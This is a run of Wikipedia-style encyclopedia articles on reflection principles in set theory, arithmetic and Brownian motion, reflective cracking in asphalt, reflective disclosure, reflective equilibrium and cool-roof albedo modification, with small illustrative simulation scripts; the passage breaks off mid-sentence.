Another form of the reflection principle in ZFC says that for any finite set of axioms of ZFC we can find a countable transitive model satisfying these axioms. (In particular this proves that, unless inconsistent, ZFC is not finitely axiomatizable because if it were it would prove the existence of a model of itself, and hence prove its own consistency, contradicting Gödel's second incompleteness theorem.) This version of the reflection theorem is closely related to the Löwenheim–Skolem theorem .
If κ {\displaystyle \kappa } is a strong inaccessible cardinal , then there is a closed unbounded subset C {\displaystyle C} of κ {\displaystyle \kappa } , such that for every α ∈ C {\displaystyle \alpha \in C} , V α {\displaystyle V_{\alpha }} is an elementary substructure of V κ {\displaystyle V_{\kappa }} .
Reflection principles are connected to and can be used to motivate large cardinal axioms. Reinhardt gives the following examples: [ 9 ]
Paul Bernays used a reflection principle as an axiom for one version of set theory (not Von Neumann–Bernays–Gödel set theory , which is a weaker theory). His reflection principle stated roughly that if A {\displaystyle A} is a class with some property, then one can find a transitive set u {\displaystyle u} such that A ∩ u {\displaystyle A\cap u} has the same property when considered as a subset of the "universe" u {\displaystyle u} . This is quite a powerful axiom and implies the existence of several of the smaller large cardinals , such as inaccessible cardinals . (Roughly speaking, the class of all ordinals in ZFC is an inaccessible cardinal apart from the fact that it is not a set, and the reflection principle can then be used to show that there is a set that has the same property, in other words that is an inaccessible cardinal.) Unfortunately, this cannot be axiomatized directly in ZFC, and a class theory like Morse–Kelley set theory normally has to be used. The consistency of Bernays's reflection principle is implied by the existence of an ω-Erdős cardinal .
More precisely, the axioms of Bernays' class theory are: [ 10 ]
where P {\displaystyle {\mathcal {P}}} denotes the powerset .
According to Akihiro Kanamori , [ 11 ] : 62 in a 1961 paper, Bernays considered the reflection schema
for any formula ϕ {\displaystyle \phi } without x {\displaystyle x} free, where transitive ( x ) {\displaystyle {\text{transitive}}(x)} asserts that x {\displaystyle x} is transitive . Starting with the observation that set parameters a 1 , … , a n {\displaystyle a_{1},\ldots ,a_{n}} can appear in ϕ {\displaystyle \phi } and x {\displaystyle x} can be required to contain them by introducing clauses ∃ y ( a i ∈ y ) {\displaystyle \exists y(a_{i}\in y)} into ϕ {\displaystyle \phi } , Bernays just with this schema established pairing , union , infinity , and replacement , in effect achieving a remarkably economical presentation of ZF .
Some formulations of Ackermann set theory use a reflection principle. Ackermann's axiom states that, for any formula ϕ {\displaystyle \phi } not mentioning V {\displaystyle V} , [ 2 ]
Peter Koellner showed that a general class of reflection principles deemed "intrinsically justified" are either inconsistent or weak, in that they are consistent relative to the Erdős cardinal . [ 12 ] However, there are more powerful reflection principles, which are closely related to the various large cardinal axioms. For almost every known large cardinal axiom there is a known reflection principle that implies it, and conversely all but the most powerful known reflection principles are implied by known large cardinal axioms. [ 10 ] An example of this is the wholeness axiom , [ 13 ] which implies the existence of super- n -huge cardinals for all finite n and its consistency is implied by an I3 rank-into-rank cardinal .
Add an axiom saying that Ord is a Mahlo cardinal — for every closed unbounded class of ordinals C (definable by a formula with parameters), there is a regular ordinal in C . This allows one to derive the existence of strong inaccessible cardinals and much more over any ordinal.
Reflection principles may be considered for theories of arithmetic which are generally much weaker than ZFC.
Let P A {\displaystyle {\mathsf {PA}}} denote Peano arithmetic , and P A k {\displaystyle {\mathsf {PA}}_{k}} denote the set of true sentences in the language of PA that are Σ k {\displaystyle \Sigma _{k}} in the arithmetical hierarchy . Mostowski's reflection theorem is that for each natural number k {\displaystyle k} , P A {\displaystyle PA} proves the consistency of P A k {\displaystyle {\mathsf {PA}}_{k}} . As each set P A k {\displaystyle {\mathsf {PA}}_{k}} is Σ k {\displaystyle \Sigma _{k}} -definable, this must be expressed as a theorem schema. [ 14 ] p. 4 These soundness principles are sometimes referred to as syntactic reflection principles, in contrast to the satisfaction-based varieties mentioned above, which are called semantic reflection principles. [ 15 ] p. 1
The local reflection principle R f n ( T ) {\displaystyle Rfn(T)} for a theory T {\displaystyle T} is the schema that for each sentence ϕ {\displaystyle \phi } of the language of T {\displaystyle T} , P r o v T ( ϕ ) ⟹ ϕ {\displaystyle \mathrm {Prov} _{T}(\phi )\implies \phi } . When R f n Γ ( T ) {\displaystyle Rfn_{\Gamma }(T)} is the restricted version of the principle only considering the ϕ {\displaystyle \phi } in a class of formulas Γ {\displaystyle \Gamma } , C o n ( T ) {\displaystyle \mathrm {Con} (T)} and R f n Π 1 0 ( T ) {\displaystyle Rfn_{\Pi _{1}^{0}}(T)} are equivalent over T {\displaystyle T} . [ 16 ] p. 205
The uniform reflection principle R F N ( T ) {\displaystyle RFN(T)} for a theory T {\displaystyle T} is the schema that for each natural number n {\displaystyle n} , ∀ ( ⌜ ϕ ⌝ ∈ Σ n 0 ∪ Π n 0 ) ∀ ( y 0 , … , y m ∈ N ) ( P r T ( ⌜ ϕ ( y 0 , … , y m ) ∗ ⌝ ) ⟹ T r n ( ⌜ ϕ ( y 0 , … , y m ) ∗ ⌝ ) ) {\displaystyle \forall (\ulcorner \phi \urcorner \in \Sigma _{n}^{0}\cup \Pi _{n}^{0})\forall (y_{0},\ldots ,y_{m}\in \mathbb {N} )(\mathrm {Pr} _{T}(\ulcorner \phi (y_{0},\ldots ,y_{m})^{*}\urcorner )\implies \mathrm {Tr} _{n}(\ulcorner \phi (y_{0},\ldots ,y_{m})^{*}\urcorner ))} , where Σ n 0 ∪ Π n 0 {\displaystyle \Sigma _{n}^{0}\cup \Pi _{n}^{0}} is the union of the sets of Gödel-numbers of Σ n 0 {\displaystyle \Sigma _{n}^{0}} and Π n 0 {\displaystyle \Pi _{n}^{0}} formulas, and ϕ ( y 0 , … , y m ) ∗ {\displaystyle \phi (y_{0},\ldots ,y_{m})^{*}} is ϕ {\displaystyle \phi } with its free variables y 0 , … , y m {\displaystyle y_{0},\ldots ,y_{m}} replaced with numerals S … S ⏟ y 0 0 {\displaystyle \underbrace {S\ldots S} _{y_{0}}0} , etc. in the language of Peano arithmetic, and T r n {\displaystyle \mathrm {Tr} _{n}} is the partial truth predicate for Σ n 0 ∪ Π n 0 {\displaystyle \Sigma _{n}^{0}\cup \Pi _{n}^{0}} formulas. [ 16 ] p. 205
For k ≥ 1 {\displaystyle k\geq 1} , a β k {\displaystyle \beta _{k}} -model is a model which has the correct truth values of Π k 1 {\displaystyle \Pi _{k}^{1}} statements, where Π k 1 {\displaystyle \Pi _{k}^{1}} is at the k + 1 {\displaystyle k+1} th level of the analytical hierarchy . A countable β k {\displaystyle \beta _{k}} -model of a subsystem of second-order arithmetic consists of a countable set of sets of natural numbers, which may be encoded as a subset of N {\displaystyle \mathbb {N} } . The theory Π 1 1 − C A 0 {\displaystyle \Pi _{1}^{1}{\mathsf {-CA}}_{0}} proves the existence of a β 1 {\displaystyle \beta _{1}} -model, also known as a β {\displaystyle \beta } -model. [ 17 ] Theorem VII.2.16
The β k {\displaystyle \beta _{k}} -model reflection principle for Σ n 1 {\displaystyle \Sigma _{n}^{1}} formulas states that for any Σ n 1 {\displaystyle \Sigma _{n}^{1}} formula θ ( X ) {\displaystyle \theta (X)} with X {\displaystyle X} as its only free set variable, for all X ⊆ N {\displaystyle X\subseteq \mathbb {N} } , if θ ( X ) {\displaystyle \theta (X)} holds, then there is a countable coded β k {\displaystyle \beta _{k}} -model M {\displaystyle M} where X ∈ M {\displaystyle X\in M} such that M ⊨ θ ( X ) {\displaystyle M\vDash \theta (X)} . Let Σ k 1 − D C 0 {\displaystyle \Sigma _{k}^{1}{\mathsf {-DC}}_{0}} denote the extension of A C A 0 {\displaystyle {\mathsf {ACA}}_{0}} by a schema of dependent choice for Σ k 1 {\displaystyle \Sigma _{k}^{1}} formulas. For any k ≥ 0 {\displaystyle k\geq 0} , the system Σ k + 2 1 − D C 0 {\displaystyle \Sigma _{k+2}^{1}{\mathsf {-DC}}_{0}} is equivalent to β k + 1 {\displaystyle \beta _{k+1}} -reflection for Σ k + 4 1 {\displaystyle \Sigma _{k+4}^{1}} formulas. [ 17 ] Theorem VII.7.6
β {\displaystyle \beta } -model reflection has connections to set-theoretic reflection; for example, over the weak set theory KP , adding the schema of reflection of Π n {\displaystyle \Pi _{n}} -formulas to transitive sets ( ϕ ⟹ ∃ z ( transitive ( z ) ∧ ϕ z ) {\displaystyle \phi \implies \exists z({\textrm {transitive}}(z)\land \phi ^{z})} for all Π n {\displaystyle \Pi _{n}} formulas ϕ {\displaystyle \phi } ) yields the same Π 4 1 {\displaystyle \Pi _{4}^{1}} -consequences as A C A + B I {\displaystyle {\mathsf {ACA+BI}}} plus a schema of β {\displaystyle \beta } -model reflection for Π n + 1 1 {\displaystyle \Pi _{n+1}^{1}} formulas. [ 18 ] | https://en.wikipedia.org/wiki/Reflection_principle
In the theory of probability for stochastic processes , the reflection principle for a Wiener process states that if the path of a Wiener process f ( t ) reaches a value f ( s ) = a at time t = s , then the subsequent path after time s has the same distribution as the reflection of the subsequent path about the value a . [ 1 ] More formally, the reflection principle refers to a theorem concerning the distribution of the supremum of the Wiener process, or Brownian motion. The result relates the distribution of the supremum of Brownian motion up to time t to the distribution of the process at time t . It is a corollary of the strong Markov property of Brownian motion.
If ( W ( t ) : t ≥ 0 ) {\displaystyle (W(t):t\geq 0)} is a Wiener process, and a > 0 {\displaystyle a>0} is a threshold (also called a crossing point), then the theorem states: {\displaystyle \operatorname {P} \left(\sup _{0\leq s\leq t}W(s)\geq a\right)=2\operatorname {P} (W(t)\geq a).}
Assuming W ( 0 ) = 0 {\displaystyle W(0)=0} , due to the continuity of Wiener processes, each path (one sampled realization) of the Wiener process on ( 0 , t ) {\displaystyle (0,t)} which finishes at or above the threshold a {\displaystyle a} at time t {\displaystyle t} (that is, W ( t ) ≥ a {\displaystyle W(t)\geq a} ) must have reached the threshold ( W ( t a ) = a {\displaystyle W(t_{a})=a} ) for the first time at some earlier time t a ≤ t {\displaystyle t_{a}\leq t} . (It can cross the level a {\displaystyle a} multiple times on the interval ( 0 , t ) {\displaystyle (0,t)} ; we take the earliest such time.)
For every such path, one can define another path W ′ ( t ) {\displaystyle W'(t)} on ( 0 , t ) {\displaystyle (0,t)} that agrees with the original path before t a {\displaystyle t_{a}} and is reflected (vertically flipped) symmetrically about the level a {\displaystyle a} on the sub-interval ( t a , t ) {\displaystyle (t_{a},t)} . These reflected paths are also sample paths of the Wiener process: they reach the value a {\displaystyle a} at time t a {\displaystyle t_{a}} ( W ′ ( t a ) = a {\displaystyle W'(t_{a})=a} ), but finish below a {\displaystyle a} . Thus, of all the paths that reach a {\displaystyle a} on the interval ( 0 , t ) {\displaystyle (0,t)} , half finish below a {\displaystyle a} and half finish at or above it. Hence, the probability of finishing at or above a {\displaystyle a} is half that of reaching a {\displaystyle a} at all.
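This path-counting heuristic can be checked numerically. The following minimal Monte Carlo sketch (assuming only NumPy; the threshold a, the horizon t and the grid size are arbitrary illustrative choices) simulates discretized Wiener paths and compares the empirical probability that the running maximum reaches a with twice the probability that the endpoint lies at or above a.

```python
import numpy as np

rng = np.random.default_rng(0)

t, a = 1.0, 1.0                  # time horizon and threshold (illustrative values)
n_paths, n_steps = 10_000, 1_000
dt = t / n_steps

# Simulate increments of a standard Wiener process and build the discretized paths.
increments = rng.normal(0.0, np.sqrt(dt), size=(n_paths, n_steps))
paths = np.cumsum(increments, axis=1)

running_max = paths.max(axis=1)
endpoint = paths[:, -1]

p_max_reaches_a = np.mean(running_max >= a)   # estimates P(sup_{0<=s<=t} W(s) >= a)
p_end_above_a = np.mean(endpoint >= a)        # estimates P(W(t) >= a)

# Up to discretization bias (the grid maximum slightly underestimates the true
# supremum) and Monte Carlo noise, the two printed values agree, illustrating
# P(sup W >= a) = 2 P(W(t) >= a).
print(f"P(max >= a)      ~ {p_max_reaches_a:.4f}")
print(f"2 * P(W(t) >= a) ~ {2 * p_end_above_a:.4f}")
```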
In a stronger form, the reflection principle says that if τ {\displaystyle \tau } is a stopping time then the reflection of the Wiener process starting at τ {\displaystyle \tau } , denoted ( W τ ( t ) : t ≥ 0 ) {\displaystyle (W^{\tau }(t):t\geq 0)} , is also a Wiener process, where: {\displaystyle W^{\tau }(t)=W(t)\chi _{\{t\leq \tau \}}+(2W(\tau )-W(t))\chi _{\{t>\tau \}},}
and the indicator function χ { t ≤ τ } = { 1 , if t ≤ τ 0 , otherwise {\displaystyle \chi _{\{t\leq \tau \}}={\begin{cases}1,&{\text{if }}t\leq \tau \\0,&{\text{otherwise }}\end{cases}}} and χ { t > τ } {\displaystyle \chi _{\{t>\tau \}}} is defined similarly. The stronger form implies the original theorem by choosing τ = inf { t ≥ 0 : W ( t ) = a } {\displaystyle \tau =\inf \left\{t\geq 0:W(t)=a\right\}} .
The earliest stopping time for reaching crossing point a , τ a := inf { t : W ( t ) = a } {\displaystyle \tau _{a}:=\inf \left\{t:W(t)=a\right\}} , is an almost surely finite stopping time. Then we can apply the strong Markov property to deduce that a relative path subsequent to τ a {\displaystyle \tau _{a}} , given by X t := W ( t + τ a ) − a {\displaystyle X_{t}:=W(t+\tau _{a})-a} , is also simple Brownian motion independent of F τ a W {\displaystyle {\mathcal {F}}_{\tau _{a}}^{W}} . Then the probability that W ( s ) {\displaystyle W(s)} reaches or exceeds the threshold a {\displaystyle a} at some time in the interval [ 0 , t ] {\displaystyle [0,t]} can be decomposed as
{\displaystyle \operatorname {P} \left(\sup _{0\leq s\leq t}W(s)\geq a\right)=\operatorname {P} \left(\tau _{a}\leq t,\,W(t)\geq a\right)+\operatorname {P} \left(\tau _{a}\leq t,\,W(t)<a\right)}
{\displaystyle =\operatorname {P} \left(W(t)\geq a\right)+\operatorname {P} \left(\tau _{a}\leq t,\,W(t)<a\right).}
By the tower property for conditional expectations , the second term reduces to: {\displaystyle \operatorname {P} \left(\tau _{a}\leq t,\,W(t)<a\right)=\operatorname {E} \left[\chi _{\{\tau _{a}\leq t\}}\,\operatorname {P} \left(W(t)<a\mid {\mathcal {F}}_{\tau _{a}}^{W}\right)\right]=\operatorname {E} \left[\chi _{\{\tau _{a}\leq t\}}\,\operatorname {P} \left(X(t-\tau _{a})<0\mid {\mathcal {F}}_{\tau _{a}}^{W}\right)\right]={\frac {1}{2}}\operatorname {P} \left(\tau _{a}\leq t\right)={\frac {1}{2}}\operatorname {P} \left(\sup _{0\leq s\leq t}W(s)\geq a\right),}
since X ( t ) {\displaystyle X(t)} is a standard Brownian motion independent of F τ a W {\displaystyle {\mathcal {F}}_{\tau _{a}}^{W}} and has probability 1 / 2 {\displaystyle 1/2} of being less than 0 {\displaystyle 0} . The proof of the theorem is completed by substituting this into the second line of the first equation. [ 2 ]
The reflection principle is often used to simplify distributional properties of Brownian motion. Considering Brownian motion on the restricted interval ( W ( t ) : t ∈ [ 0 , 1 ] ) {\displaystyle (W(t):t\in [0,1])} , the reflection principle allows one to prove that the location of the maximum t max {\displaystyle t_{\text{max}}} , satisfying W ( t max ) = sup 0 ≤ s ≤ 1 W ( s ) {\displaystyle W(t_{\text{max}})=\sup _{0\leq s\leq 1}W(s)} , has the arcsine distribution . This is one of the Lévy arcsine laws . [ 3 ] | https://en.wikipedia.org/wiki/Reflection_principle_(Wiener_process)
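A similar simulation sketch (again assuming NumPy, with an arbitrary grid size and path count) illustrates this arcsine law by comparing the empirical distribution of the location of the maximum on [0, 1] with the arcsine cumulative distribution function F(x) = (2/π) arcsin(√x).

```python
import numpy as np

rng = np.random.default_rng(1)

n_paths, n_steps = 10_000, 1_000
dt = 1.0 / n_steps

paths = np.cumsum(rng.normal(0.0, np.sqrt(dt), size=(n_paths, n_steps)), axis=1)
t_max = (paths.argmax(axis=1) + 1) * dt      # location of the maximum on [0, 1]

# Compare the empirical CDF of t_max with the arcsine CDF at a few points.
for x in (0.1, 0.25, 0.5, 0.75, 0.9):
    empirical = np.mean(t_max <= x)
    arcsine = (2.0 / np.pi) * np.arcsin(np.sqrt(x))
    print(f"x = {x:.2f}   empirical = {empirical:.3f}   arcsine = {arcsine:.3f}")
```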
A reflective crack is a type of failure in asphalt pavement, one of the most popular road surface types. Asphalt pavement is impacted by traffic and thermal loading. Due to this loading, cracks can appear on the pavement surface that can reduce the Pavement Condition Index (PCI) dramatically.
The pavement can be maintained by overlay. Cracks under the overlay can cause stress concentration at the bottom of the overlay. Due to the repeated stress concentration, a crack starts in the overlay that has a similar shape to the crack in the old pavement. This crack is called a "reflective crack". [ 1 ] Reflective cracking can be categorized as one of the distresses in asphalt pavement. [ 2 ] It can affect the general performance and durability of the pavement. A reflective crack can also open a way for water to enter the pavement's body and increase the deterioration rate. [ 3 ] Reflective cracks can also happen in overlays placed on joints or cracks in composite pavements such as concrete pavements. [ 4 ] Another type of road infrastructure, dynamic inductive charging infrastructure , was found to increase the occurrence of reflective cracks in road surfaces. [ 5 ] [ 6 ] | https://en.wikipedia.org/wiki/Reflective_crack |
Reflective disclosure is a model of social criticism proposed and developed by philosopher Nikolas Kompridis . It is partly based on Martin Heidegger's insights into the phenomenon of world disclosure , which Kompridis applies to the field of political and social philosophy . The term refers to practices through which we can imagine and articulate meaningful alternatives to current social and political conditions, by acting back on their conditions of intelligibility. This could uncover possibilities that were previously suppressed or untried, or make us insightfully aware of a problem in a way that allows us to go on differently with our institutions , traditions and ideals .
In his book Critique and Disclosure: Critical Theory between Past and Future , Kompridis describes a set of heterogeneous social practices he believes can be a source of significant ethical, political, and cultural transformation. [ 1 ] Highlighting the work of theorists such as Hannah Arendt , Charles Taylor , Michel Foucault and others, Kompridis calls such practices examples of "reflective disclosure" after Martin Heidegger's insights into the phenomenon of world disclosure . He also argues that social criticism or critique, and in particular critical theory , ought to incorporate Heidegger's insights about this phenomenon and reorient itself around practices of reflective disclosure if it is, as he puts it, "to have a future worthy of its past". [ 2 ]
These practices, according to Kompridis, constitute what Charles Taylor calls a "new department" of reason [ 3 ] which is distinct from instrumental reason , from reason understood merely as the slave of the passions ( Hume ), and from the idea of reason as public justification ( Rawls ). In contrast to theories of social and political change that emphasize socio-historical contradictions (i.e., Marxist and neo-Marxist ), theories of recognition and self-realization, and theories that try to make sense of change in terms of processes that are outside the scope of human agency , Kompridis' paradigm for critical theory, with reflective disclosure at the centre, is to help reopen the future by disclosing alternative possibilities for speech and action, self-critically expanding what he calls the normative and logical "space of possibility". [ 4 ]
Kompridis contrasts his own vision of critical theory with a Habermasian emphasis on the procedures by which we can reach agreement in modern democratic societies. He claims the latter has ignored the utopian concerns that previously animated critical theory, and narrowed its scope in a way that brings it closer to liberal and neo- Kantian theories of justice.
| https://en.wikipedia.org/wiki/Reflective_disclosure
Reflective equilibrium is a state of balance or coherence among a set of beliefs arrived at by a process of deliberative mutual adjustment among general principles and particular judgements . Although he did not use the term, philosopher Nelson Goodman introduced the method of reflective equilibrium as an approach to justifying the principles of inductive logic [ 1 ] (this is now known as Goodman's method ). [ 2 ] The term reflective equilibrium was coined by John Rawls and popularized in his A Theory of Justice as a method for arriving at the content of the principles of justice.
Dietmar Hübner [ de ] has pointed out that there are many interpretations of reflective equilibrium that deviate from Rawls' method in ways that reduce the cogency of the idea. [ 3 ] Among these misinterpretations, according to Hübner, are definitions of reflective equilibrium as "(a) balancing theoretical accounts against intuitive convictions; (b) balancing general principles against particular judgements; (c) balancing opposite ethical conceptions or divergent moral statements". [ 3 ]
Rawls argues that human beings have a "sense of justice " that is a source of both moral judgment and moral motivation. In Rawls's theory, we begin with "considered judgments" that arise from the sense of justice. These may be judgments about general moral principles (of any level of generality) or specific moral cases. If our judgments conflict in some way, we proceed by adjusting our various beliefs until they are in "equilibrium", which is to say that they are stable, not in conflict, and provide consistent practical guidance. Rawls argues that a set of moral beliefs in ideal reflective equilibrium describes or characterizes the underlying principles of the human sense of justice.
For example, suppose that Zachary believes in the general principle of always obeying the commands in the Bible . Suppose also that he thinks that it is not ethical to stone people to death merely for being Wiccan . These views may come into conflict (see Exodus 22:18 versus John 8:7). If they do, Zachary will then have several choices. He can discard his general principle in search of a better one, such as obeying only the Ten Commandments ; or modify his general principle by choosing a different translation of the Bible, or letting Jesus' teaching from John 8:7 "If any of you is without sin, let him be the first to cast a stone", override the Old Testament command; or change his opinions about the point in question to conform with his theory, by deciding that witches really should be killed. Whatever the decision, he has moved toward reflective equilibrium.
Reflective equilibrium serves an important justificatory function within Rawls's political theory. The nature of this function, however, is disputed. The dominant view, best exemplified by the work of Norman Daniels and Thomas Scanlon , is that the method of reflective equilibrium is a kind of coherentist method for the epistemic justification of moral beliefs. However, in other writings, Rawls seems to argue that his theory bypasses traditional metaethical questions, including questions of moral epistemology, and is intended instead to serve a practical function. This provides some motivation for a different view of the justificatory role of reflective equilibrium. On this view, the method of reflective equilibrium serves its justificatory function by linking together the cognitive and motivational aspects of the human sense of justice in the appropriate way.
Rawls argues that candidate principles of justice cannot be justified unless they are shown to be stable. Principles of justice are stable if, among other things, the members of society regard them as authoritative and reliably comply with them. The method of reflective equilibrium determines a set of principles rooted in the human sense of justice, which is a capacity that provides both the material for the process of reflective equilibration and our motivation to adhere to principles we judge morally sound. The method of reflective equilibrium serves the aim of defining a realistic and stable social order by determining a practically coherent set of principles that are grounded in the right way in the source of our moral motivation, such that we will be disposed to comply with them. As Fred D'Agostino puts it, stable principles of justice will require considerable "up-take" by the members of society. The method of reflective equilibrium provides a way of settling on principles that will achieve the kind of "up-take" necessary for stability.
Reflective equilibrium is not static, though Rawls allows for provisional fixed points; it will change as the individual considers his opinions about individual issues or explores the consequences of his principles. [ 4 ]
Rawls applied this technique to his conception of a hypothetical original position from which people would agree to a social contract . He arrived at the conclusion that the optimal theory of justice is the one to which people would agree from behind a veil of ignorance , not knowing their social positions.
Wide reflective equilibrium, first introduced by Rawls, has been described by Norman Daniels as "a method that attempts to produce coherence in ordered triple sets of beliefs held by a particular person, namely: (a) a set of considered moral judgments, (b) a set of moral principles, and (c) a set of relevant (scientific and philosophical) background theories". [ 5 ]
Kai Nielsen has asserted that "philosophers who are defenders of reflective equilibrium are also constructivists ", in response to what he considered to be the misconception that reflective equilibrium works with some necessarily preexisting coherent system of moral beliefs and practices: [ 6 ]
The pattern of consistent beliefs, including very centrally moral beliefs, is not a structure to be discovered or unearthed, as if it were analogous to the deep underlying "depth grammar" of language (if indeed there is any such a thing), but something to be forged —constructed—by a careful and resolute use of the method of reflective equilibrium. We start from our considered judgments (convictions), however culturally and historically skewed. This involves—indeed, inescapably involves—seeing things by our own lights. Where else could we start? We can hardly jump out of our cultural and historical skins. [ 6 ]
Paul Thagard has criticized the method of reflective equilibrium as "only like a smokescreen for a relatively sophisticated form of logical and methodological relativism" and "at best incidental to the process of developing normative principles". [ 7 ] Among the "numerous problems" of reflective equilibrium, Thagard counted "undue reliance on intuition and the danger of arriving at stable but suboptimal sets of norms". [ 8 ] In place of reflective equilibrium, Thagard recommended what he considered to be a more consequentialist method of justifying norms by identifying a domain of practices, identifying candidate norms for the practices, identifying the appropriate goals of the practices, evaluating the extent to which different practices accomplish these goals, and adopting as domain norms the practices that best accomplish these goals. [ 8 ] [ 9 ] | https://en.wikipedia.org/wiki/Reflective_equilibrium |
Reflective surfaces , or ground-based albedo modification ( GBAM ), is a solar radiation management method of enhancing Earth's albedo (the ability to reflect the visible , infrared , and ultraviolet wavelengths of the Sun , reducing heat transfer to the surface). The IPCC described GBAM as "whitening roofs, changes in land use management (e.g., no-till farming ), change of albedo at a larger scale (covering glaciers or deserts with reflective sheeting and changes in ocean albedo)." [ 1 ] : 348
The most well-known type of reflective surface is a type of roof called the "cool roof". While cool roofs are mostly associated with white roofs, they come in a variety of colors and materials and are available for both commercial and residential buildings. [ 2 ] Painting roof materials in white or pale colors to reflect solar radiation is encouraged by legislation in some areas (notably California). [ 3 ]
This technique is limited in its ultimate effectiveness by the constrained surface area available for treatment. This technique can give between 0.01 and 0.19 W/m² of globally averaged negative forcing, depending on whether cities or all settlements are so treated. [ 4 ] This is small relative to the 3.7 W/m² of positive forcing from a doubling of atmospheric carbon dioxide. Moreover, while at small scales it can be achieved at little or no cost by simply selecting different materials, it can be costly if implemented on a larger scale.
A 2009 Royal Society report states that, "the overall cost of a 'white roof method' covering an area of 1% of the land surface (about 10¹² m²) would be about $300 billion/yr, making this one of the least effective and most expensive methods considered." [ 5 ] However, it can reduce the need for air conditioning , which emits carbon dioxide and contributes to global warming.
As a method to address global warming , the IPCC 2018 report indicated that the potential for global temperature reduction was "small," though there was high agreement that temperature changes of 1–3 °C could be achieved on a regional scale. [ 1 ] Limited application of reflective surfaces can mitigate the urban heat island effect.
Reflective surfaces can be used to change the albedo of agricultural and urban areas, noting that a 0.04-0.1 albedo change in urban and agricultural areas could potentially reduce global temperatures for overshooting 1.0 °C. [ 1 ]
The reflective surfaces approach is similar to passive daytime radiative cooling (PDRC) being that they are both ground-based, yet PDRC focuses on "increasing the radiative heat emission from the Earth rather than merely decreasing its solar absorption." [ 7 ]
Cool roofs, in hot climates, can offer both immediate and long-term benefits including:
Cool roofs achieve cooling energy savings in hot summers but can increase heating energy load during cold winters. [ 11 ] Therefore, the net energy saving of cool roofs varies depending on climate. However, a 2010 energy efficiency study [ 12 ] looking at this issue for air-conditioned commercial buildings across the United States found that the summer cooling savings typically outweigh the winter heating penalty even in cold climates near the Canada–US border giving savings in both electricity and emissions. Without a proper maintenance program to keep the material clean, the energy savings of cool roofs can diminish over time due to albedo degradation and soiling. [ 13 ]
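A toy calculation can make this climate dependence concrete. The sketch below is purely illustrative: the per-degree-day coefficients are hypothetical placeholders, not values taken from the cited study, and real estimates would also depend on insulation, building type and utility rates.

```python
# Toy degree-day model of cool-roof net energy savings (illustrative only;
# the per-degree-day coefficients are hypothetical, not measured values).

def net_annual_savings(cdd: float, hdd: float,
                       cooling_saving_per_cdd: float = 0.9,
                       heating_penalty_per_hdd: float = 0.3) -> float:
    """Net annual savings (arbitrary units) for one building: cooling savings
    scale with cooling degree-days (CDD), while the winter heating penalty
    scales with heating degree-days (HDD)."""
    return cdd * cooling_saving_per_cdd - hdd * heating_penalty_per_hdd

# Hypothetical climates: hot (many CDD, few HDD) versus cold (the reverse).
for name, cdd, hdd in [("hot climate", 2500, 500), ("cold climate", 600, 3500)]:
    print(f"{name}: net savings ~ {net_annual_savings(cdd, hdd):+.0f}")
```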
A modelling study of the impacts of reductions in temperature due to cool roofs in London during the 2018 British Isles heatwave found that heat-related mortality in this period (estimated 655–920) could have been reduced by 249 (32%) in a scenario where all buildings are assumed to have cool roofs installed. Using the value of statistical life, the benefits in terms of avoided deaths for cool roofs were estimated at a saving of £615 million. [ 14 ]
Research and practical experience with the degradation of roofing membranes over a number of years have shown that heat from the sun is one of the most potent factors that affects durability. High temperatures and large variations, seasonally or daily, at the roofing level are detrimental to the longevity of roof membranes. Reducing the extremes of temperature change will reduce the incidence of damage to membrane systems. Covering membranes with materials that reflect ultraviolet and infrared radiation will reduce damage caused by UV and heat degradation. White surfaces reflect more than half of the radiation that reaches them, while black surfaces absorb almost all. White or white coated roofing membranes, or white gravel cover would appear to be the best approach to control these problems where membranes must be left exposed to solar radiation. [ 15 ]
If all urban, flat roofs in warm climates were whitened, the resulting 10% increase in global reflectivity would offset the warming effect of 24 gigatonnes of greenhouse gas emissions, or equivalent to taking 300 million cars off the road for 20 years. This is because a 93-square-metre (1,000 sq ft) white roof will offset 10 tons of carbon dioxide over its 20-year lifetime. [ 16 ] In a real-world 2008 case study [ 17 ] of large-scale cooling from increased reflectivity, it was found that the Province of Almeria, Southern Spain, has cooled 1.6 °C (2.9 °F) over a period of 20 years compared to surrounding regions, as a result of polythene-covered greenhouses being installed over a vast area that was previously open desert. In the summer the farmers whitewash these roofs to cool their plants down.
When sunlight falls on a white roof much of it is reflected and passes back through the atmosphere into space. But when sunlight falls on a dark roof most of the light is absorbed and re-radiated as much longer wavelengths, which are absorbed by the atmosphere. (The gases in the atmosphere that most strongly absorb these long wavelengths have been termed "greenhouse gases"). [ 18 ] Findings of a study conducted by Syed Ahmad Farhan et al. from Universiti Teknologi PETRONAS and Universiti Teknologi MARA in 2021, [ 2 ] which is based on the hot and humid climate of Malaysia , suggest that the selection of white roof tiles significantly reduces the peaks of heat conduction transfer and roof-top surface temperature as well as the values of heat conduction transfer and roof-top surface temperature throughout diurnal profiles. Contrarily, the results also reveal that it does not influence the nocturnal profiles, as a release of heat to the sky takes place throughout the night. The release of heat from the building occurs due to the absence of solar radiation, which reduces the sky temperature and enables the sky to act as a heat sink that promotes the transfer of heat from the building to the sky to achieve thermal equilibrium .
A 2012 study by researchers at Concordia University included variables similar to those used in the Stanford study (e.g., cloud responses) and estimated that worldwide deployment of cool roofs and pavements in cities would generate a global cooling effect equivalent to offsetting up to 150 gigatonnes of carbon dioxide emissions – enough to take every car in the world off the road for 50 years. [ 19 ] [ 20 ]
White thermoplastic membrane roofs (PVC and TPO) are inherently reflective, achieving some of the highest reflectance and emittance measurements of which roofing materials are capable. [ 21 ] A roof made of white thermoplastic, for example, can reflect 80 percent or more of the sun's rays and emit at least 70% of the solar radiation that the roof absorbs. An asphalt roof only reflects between 6 and 26% of solar radiation.
In addition to the white Thermoplastic PVC and TPO membranes used in many commercial cool roof applications, there is also research in the field of cool asphalt shingles. Asphalt shingles make up the majority of the North American residential roofing market, and consumer preferences for darker colors make creating solar-reflective shingles a particular challenge, causing asphalt shingles to have solar reflectances of only 4%-26%. When these roofs are designed to reflect increased amount of solar radiation, the urban heat island effect can be reduced through the reduced need for cooling costs in the summer. Though a more reflective roof can lead to higher heating costs in the colder months, studies have shown that the increased winter heating costs are still lower than the summer cooling cost savings. [ 22 ] To satisfy the consumer demands for darker colors which still reflect significant amounts of sunlight, different materials, coating processes, and pigments are used. Since only 43% of light occurs in the visible light spectrum, reflectance can be improved without affecting color by increasing the reflectance of UV and IR light. [ 23 ] High surface roughness can also contribute to the low solar reflectances of asphalt shingles, as these shingles are made of many small approximately spherical granules which have a high surface roughness. [ 24 ] To decrease this, other granule materials are being investigated, such as flat rock flakes, which could reduce the reflectance inefficiencies due to surface 